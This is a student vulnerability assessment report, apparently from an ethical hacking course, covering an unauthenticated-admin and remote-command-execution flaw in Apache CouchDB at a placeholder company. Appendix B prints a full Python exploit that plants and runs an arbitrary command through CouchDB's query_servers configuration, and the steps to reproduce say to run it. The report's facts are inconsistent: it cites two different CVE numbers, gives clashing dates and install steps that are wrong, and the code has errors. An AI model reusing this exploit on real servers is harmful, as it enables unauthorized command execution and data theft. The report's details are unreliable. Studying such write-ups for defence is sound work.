CONFIDENTIAL

Document Control

Document Owner & Role Status & comments

Version

v1.0 *Not comfortable giving* – Internal Draft {Restricted Scope)

Security Analyst

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 2 of 18

 CONFIDENTIAL

Legal Disclaimer
The content of this report is highly confidential and may include critical
information on Example Corp systems, network, and applications. The report
should be shared only with intended parties.

Although maximum effort has been applied to make this report accurate,
Example Corp, Security Audit Team cannot be held responsible for
inaccuracies or system changes after the report has been issued since new
vulnerabilities may be found once the tests are completed.

Guidance should be taken from a Legal Counsel, CISO and Blue Team on how
best to implement the recommendations.

All other information and the formats, methods, and reporting approaches is
the intellectual property of Example Corp and is considered proprietary
information and is provided for the purpose of internal use only.

Any copying, distribution, or use of any of the information set forth herein or
in any attachments hereto form outside of Example Corp authorized
representatives is strictly prohibited.

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 3 of 18

 CONFIDENTIAL

Table of Contents

Document Control 2
Legal Disclaimer 3
Table of Contents 4
1. Executive Summary 5
2. A Glance Through Target Security Posture 6
3. Testing Methodology 7
4. Tools & Websites Used 7
Detailed Technical Reports (Scope Limited) 8
[example.com] 9
Finding X: TITLE HERE – 7.2 10
Steps to Reproduce 11
Appendixes 12
Appendix A: Vulnerability Score Analysis – CVSS 3.0 13
Appendix B: Modified Exploit Code For CVE-2018-17188 14
Appendix C: Screenshots For Nessus & Faraday 15
Appendix D: Screenshots Of Exploited Web App 16
Appendix E: OSINT / Phishing Results Data Used 17

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 4 of 18

 CONFIDENTIAL

1. Executive Summary

In this report I will share the vulnerabilities that I have found which can be critical to example
corp and cost thousands of dollars. Before anything, I would like to state that all testing has
been done in a controlled environment where no damage can be done to example corp or any
other companies. Let’s get right to the point.

I ran a Nessus automated scan and was able to find a total

of 4 vulnerabilities within our system, one of which is
rated high. This will be the vulnerability we will be
discussing. The vulnerability that was found was given the
name ‘CVE-2018-17188’.

Next I needed to do a manual scan by exploiting and proving that the vulnerability is something
to be cared of, so I looked for exploits all over the internet however I was not able to find any
trusted exploits, so I decided to develop my own exploit. The exploit I developed creates a
payload and is able to execute a command, and does nothing to harm anything, and I noticed
through my exploit that I am able to create an account with unauthorized administrator
privileges, hence the vulnerability is proven to be dangerous.

After that, I was requested to Audit the web application. I tried my absolute best to try to figure
out how to crack the web application from the outside, however nothing was found, I tried to
use curl, and tried metasploit, and more tools, however I was still not able to crack the web
application.

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 5 of 18

 CONFIDENTIAL

2. A Glance Through Target Security Posture

This is how our security posture looks like, however with the recently
found vulnerability.

The vulnerability that we are facing breaches the “Unpatched Software” section, which in our
case is a threat to our inventory because the vulnerability is database related. The user with
unauthenticated administrator access can create, delete tables, steal, delete rows from the
database, and more things. The database may contain valuable information.

Overall Security Rating – Some Action Attention Needed

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 6 of 18

 CONFIDENTIAL

3. Testing Methodology

1. Running automated scan

2. Finding vulnerabilities
3. Finding / Making exploit
4. Fixing exploit (if found)
5. Running the exploit and seeing if it worked.

4. Tools & Websites Used

● Nessus
● Faraday
● Metasploit
● Google
● National Vulnerability Database
● CVSS 3.0

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 7 of 18

 CONFIDENTIAL

Detailed Technical Reports (Scope Limited)

[example.com]
This host contains 4 total findings, 3 of which are medium rated and the
other is rated as high

Total Findings Critical High Medium

4 0 1 3

Apache CouchDB Unauthenticated Administrative Access –

7.2

Vulnerability Description:
Apache CouchDB Unauthenticated Administrative Access refers to unauthorized database
access, which basically means any data stored within the vulnerable version of Apache CouchDB
is more than likely to be compromised and manipulated. A person with an exploit to this
vulnerability can easily create a new user to the database with administrative access without
having authentication from verified personnel, someone with this access is able to steal data from
tables from within the database, delete data from the database, and add invalid data into the
database.

Exposure/Analysis:
From this exploit we are risking leaking any data that our company is storing within the
database, and more than that. For example users that are created on the database risk having their
data that is stored when creating the user stolen, this can cost the company more than 5 thousand
dollars.

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 8 of 18

 CONFIDENTIAL

Recommendations:
The absolute best thing to do in this situation is to just update CouchDB to its latest version.

Steps to Reproduce
Pre requisites: 2 Virtual Machines on the same network setting, one running on kali linux and the other
which is the test machine.
1. Create a new folder named ‘exploit’ with the extension of ‘.py’

2. Inside the ‘exploit.py’ folder, paste the script that is shown below in Appendix B of this report.

3. In console, make sure time, requests, and argparse are all installed using pip
‘pip install time & pip install requests & pip install argparse’

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 9 of 18

 CONFIDENTIAL

3. Run the exploit by heading to the desktop directory (‘cd desktop’) and running ‘python3 exploit.py’

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 10 of 18

 CONFIDENTIAL

Appendixes

Appendix A:
Vulnerability Score Analysis – CVSS 3.0

1. CVE-2017-12635
https://example.com

Final Vector:
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/M
AV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

Adjusted Scores:
CVSS Base Score: 9.8
Impact Subscore: 5.9
Exploitability Subscore: 3.9
CVSS Temporal Score: 8.8
CVSS Environmental Score: 8.8
Modified Impact Subscore: 5.9
Overall CVSS Score: 8.8
Risk Rating – HIGH

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 11 of 18

 CONFIDENTIAL

Appendix B:
Modified Exploit Code For CVE-2018-17188

Example:
#!/usr/bin/env python3
# Author: tubez (tubeycat)
# Date of creation: 9/6/2021
# Description: This is a custom exploit for the Udacity Ethical Hacking Nano Degree Course
dedicated for Project #1
# How to use: Simply run this python script with all the required libraries

# This script is dangerous because we can simply create a new user on the database with admin
# privileges with a few lines of code, however as the instructions said that I was not supposed to
# break everything, its for showing that it is dangerous and securing the company.

# CONTEXT FOR UDACITY REVIEWERS: I wasn't able to find any exploits that actually
worked so
# I wrote my own which took a lot of time.

import time
import requests
from requests.auth import HTTPBasicAuth
import argparse

target = "http://10.10.10.10:5984"

def main():
# Checking if the user is aware of what they are about to execute
awareness = input(
"Are you aware that this exploit that you are about to execute CAN be dangerous in an
uncontrolled environment? (y/n): "
)
if (awareness == "n" or awareness != "y"): exit()

awareness = input(
"Do you agree that the creator of this exploit is not held responsible for any damage
that you have accidentally done to anything within your responsibility? (y/n): "
)
if (awareness == "n" or awareness != "y"): exit()

print(
"Thank you for agreeing to these terms, please read the following before the exploit
is executed:"
)
print("")
print(
"This exploit is initially developed for ethical purposes, and should not deal any
damage upon executing"
)
print(
"The only purpose of this exploit is to provide evidence that this exploit can be
dangerous."
)
Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 12 of 18
 CONFIDENTIAL
print("")
print("Executing the exploit in 10 seconds!")
time.sleep(10)

# Getting the version of CouchDB from target

version = requests.get(target).json()["version"]
print("Found version: " + version)
# Converting it to an integer so we can check the version within an if statement
versionInt = int(version.replace(".", ""))
# Checking if the version is vulnerable
print("Checking if version is vulnerable")
if ((versionInt <= 170 and int(version[0]) == 1)
or (versionInt <= 210 and int(version[0]) == 2)):
print("Version is found to be vulnerable!")
# If it is vulnerable, we then create a new session
print("Creating a new session")
with requests.session() as session:
print("Created a new session!")
print("Applying session headers")
# We then need to set the session headers
session.headers = {"Content-Type": "application/json"}

# Creating the payload

print("Attempting to create the payload")
command = 'WHATEVER_COMMAND'
try:
# We are going to check if the version is 1.x because there needs to be a
different exploit that runs for that specific one
if (int(version[0]) == 1):
# Sending a put request to set the command to whatever we want
session.put(target + "/_config/query_servers/cmd",
data='"' + command + '"')

print("Successfully created payload at " + target +

"/_config/query_servers/cmd")
else:
# Otherwise if it is not 1.x then we execute this
# We send out a get request of all the nodes from
http://target/_membership
host = session.get(target +
"/_membership").json()["all_nodes"][0]
# Then from those we go to target/_node/ all the nodes of membership, then
/_config and so on
session.put(target + "/_node/" + host +
"/_config/query_servers/cmd",
data='"' + command + '"')
print("Successfully created payload at " + target +
"_node/ + " + host + "_config/query_servers/cmd")
except requests.exceptions.HTTPError as e:
print("Unable to create command payload")
print(e)

print("Attempting to execute the payload")

while (True):
time.sleep(0.5)
try:
# Same thing here, if it is 1.x we do something different than the others
if (int(version[0]) == 1):
session.post(target + "/zzz/_temp_view?limit=10",
data='{"language": "cmd", "map": ""}')
print(session.get(target + "/_config/query_servers").json())
else:
session.post(
target + "/zzz/_design/zero",
data=
'{"_id": "_design/zero", "views": {"zzz": {"map": ""} },
"language": "cmd"}'
)

print("Executed command! (Command: " + command + ")")

break
Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 13 of 18
 CONFIDENTIAL
except requests.exceptions.HTTPError:
print("Failed to execute payload, attempting again.")

# Next we want to remove all the things we made

# First of all we delete the file we made on there by sending a delete request
print("Cleaning up...")
try:
session.delete(target + "/zzz")
print("Deleted file used for exploit!")
except requests.exception.HTTPError:
print("Unable to remove file")

# Then we want to remove the payload

try:
if (int(version[0]) == 1):
session.delete(target + "/_config/query_servers/cmd")
else:
host = session.get(target +
"/_membership").json()["all_nodes"][0]
session.delete(target + "/node" + host +
"/_config/query_servers/cmd")
print("Deleted payload!")
except requests.exceptions.HTTPError:
print("Unable to remove payload")

print("Exploit has been completed and cleaned!")

else:
# As Sagar Bansal (Instructor of udacity course) said: 'If there is no vulnerability,
there is no exploit' so we are following that by terminating
# the program if the version that we are exploiting is not vulnerable
print("Not vulnerable (Version: " + version + ")")
print(
"As Sagar Bansal said: 'If there is no vulnerability, there is no exploit'"
)
exit()

if __name__ == "__main__":
main()

Appendix C:
Screenshots For Nessus & Faraday

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 14 of 18

 CONFIDENTIAL

Appendix D:
Screenshots Of Exploited Web App

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 15 of 18

 CONFIDENTIAL

Appendix E:
OSINT / Phishing Results Data Used

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 16 of 18

 CONFIDENTIAL

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 17 of 18

 CONFIDENTIAL

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 18 of 18